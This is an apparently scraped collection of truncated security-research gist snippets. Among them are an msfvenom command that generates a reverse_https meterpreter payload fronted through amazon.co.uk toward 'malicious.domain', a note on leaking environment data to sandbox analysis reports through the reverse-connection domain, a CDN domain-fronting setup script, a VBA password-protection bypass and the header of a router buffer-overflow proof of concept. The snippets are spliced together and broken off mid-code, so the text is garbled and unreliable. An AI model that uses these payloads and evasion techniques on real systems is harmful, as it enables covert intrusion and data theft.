This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
#example: "file.to.be.(en|de)crypted" | enxor -Secret ΣΕΚΡΕΤ
Function enxor {
    Param (
        [Parameter(Mandatory=$True,ValueFromPipeline=$True, ParameterSetName="p1", position=0)]
        [System.IO.FileSystemInfo]$File,
        [Parameter(Mandatory=$True,ValueFromPipeline=$True, ParameterSetName="p2", position=0)]
        [string]$FilePath,
        [int]$Batch = 102400,
<#
${msfvenom} -p windows/meterpreter/reverse_https LHOST=amazon.co.uk LPORT=443 HttpHostHeader=malicious.domain -f psh-cmd -o rev.cmd
MSFVenom-Info -Name rev.cmd
Output:
amazon.co.uk:443
Host: malicious.domain
#>
Function Find-Pattern {
'Originally posted at: https://stackoverflow.com/questions/1026483/is-there-a-way-to-crack-the-password-on-an-excel-vba-project/53358962#53358962
'This version should work for both x86 and amd64 versions of Microsoft Office
Option Explicit
Private Const PAGE_EXECUTE_READWRITE = &H40
Private Declare PtrSafe Sub MoveMemory Lib "kernel32" Alias "RtlMoveMemory" _
    (Destination As LongPtr, Source As LongPtr, ByVal Length As LongPtr)
'Note: this "issue" was reported to checkpoint back in June/2018.
'This is mostly a reverse_https payload generated through msfvenom.
'It's modified on execution time to embed information (in base64 form) about the running environment in the domain used for the reverse
'connection.
'When the document is analysed, we should get back a report showing the "malicious" url that the document attempted to connect, which
'includes our encoded data. Some other potential avenues for data exfiltration are file and registry modifications which are normally
'included in the document analysis report.
'Note: Simple dns queries/http requests even though they are detected, the domain is not displayed in the report. I haven't spent any
'more time on this but I guess the payload has to be properly dressed/execute specific actions before getting back the full details
'of its behavior from the report
#!/bin/bash
frontable_domain=${1:-www.amazon.co.uk}
fronted_domain=${2:-your.cloudfront.net}
cert_path="ssl cert path"
cdn_port=443
local_port=443
echo "Frontable domain: $frontable_domain, Fronted: $fronted_domain"
'''
A poc for a device having the ScriptExecute buffer overflow originally reported by:
https://www.redteam-pentesting.de/en/advisories/rt-sa-2015-001/-avm-fritz-box-remote-code-execution-via-buffer-overflow
As suggested in the above advisory, parts of the source code of the vulnerable application can be found at:
https://github.com/mirror/dd-wrt/tree/master/src/router/dsl_cpe_control
Nevertheless, in the above repository there is an imposed maximum length on the user input, which mitigates the
vulnerability in the unsafe sscanf call.
This poc targets the variation without the user input length limitations.
/*
babeljs plugin that unravels a number of common obfuscation patterns (originally found in F5 JS obfuscation library).
tip: for better results you can feed the output of the below plugin to minify
usage: set the plugins in your .babelrc to the path of this script
What it does, it gets as input the following obfuscated code:
function toBeGone(s, u, m){
#!/bin/bash
: '
examples:
./ip_range_check.sh <(echo 1.1.1.1) <(echo 1.1.1.2)
#no results
./ip_range_check.sh <(echo -e '127.0/8\n1.1.1.1/31') <(echo -e '7f000001.7f000002.rbndr.us\n1.1.256\n1.1.1.2\n2.2.2.36')
#7f000001.7f000002.rbndr.us 127.0.0.1
#1.1.256 1.1.256
'
#!/bin/bash
#not sure how useful If-Modified-Since/If-Unmodified-Since would be if Last-Modified header is not available:)
resource=${1?Missing the URL of the resource}
accuracy=${2:-2} #by default, tries to identify the first 2 most significant metrics, the year and month
function replacer {
    local result i pattern replacement
    result=$1